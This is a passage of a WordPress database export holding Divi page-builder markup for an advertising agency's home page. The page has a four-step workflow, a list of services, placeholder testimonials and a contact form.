box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 14:59:47','2020-08-07 14:59:47','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(495,1,'2020-08-07 16:38:36','2020-08-07 16:38:36','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/banner.jpg\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" 